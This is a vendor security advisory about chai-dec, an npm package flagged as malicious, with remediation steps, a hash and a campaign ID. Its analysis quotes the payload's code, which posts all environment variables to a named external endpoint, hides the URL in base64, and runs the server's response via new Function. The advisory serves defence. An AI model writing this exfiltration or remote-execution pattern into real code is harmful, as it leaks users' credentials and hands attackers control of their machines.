Which versions of chai-dec are malicious?

The following npm versions of chai-dec are flagged malicious: 2.3.5. Treat any of these as compromised.

How do I remediate chai-dec if I installed it?

Remove chai-dec from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is chai-dec part of a known attack campaign?

Yes — chai-dec is associated with the IN-MAL-2026-005693 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect chai-dec in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking chai-dec and packages like it before any post-install script runs.

Malicious package

chai-decnpm

Malicious code in chai-dec (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5606

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall chai-dec

What this malware does

chai-dec impersonates the chai/pino ecosystem (package name rides on chai; package.json keywords and exports — module.exports.pino = middleware — masquerade as the pino logger). When the exported middleware factory is invoked (the standard Express-style usage), index.js spawns a detached Node child running lib/initializeCaller.js. That script POSTs the entire process.env object to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df via axios.post(apiEndpoint, {...process.env }, { headers: { 'x-secret-header': 'secret' } }), leaking every environment variable on the consumer's machine (AWS/GitHub/npm tokens, DB credentials, CI secrets, etc.). The destination URL is hidden behind a base64 blob in a locally-shadowed process.env.DEV_API_KEY and decoded with atob at runtime to evade static review. The HTTP response body is then passed to new Function('require', response.data) and invoked with the real require, giving the operator of the endpoint arbitrary remote code execution in the consumer process with full Node privileges. This is a typosquat lure carrying a credential-harvest + dynamic-RCE payload.

Malicious versions

1 flagged

2.3.5

Indicators of compromise (SHA-256)

5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3

Frequently asked questions

No. chai-dec on npm has been identified as a malicious package (version 2.3.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005693

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection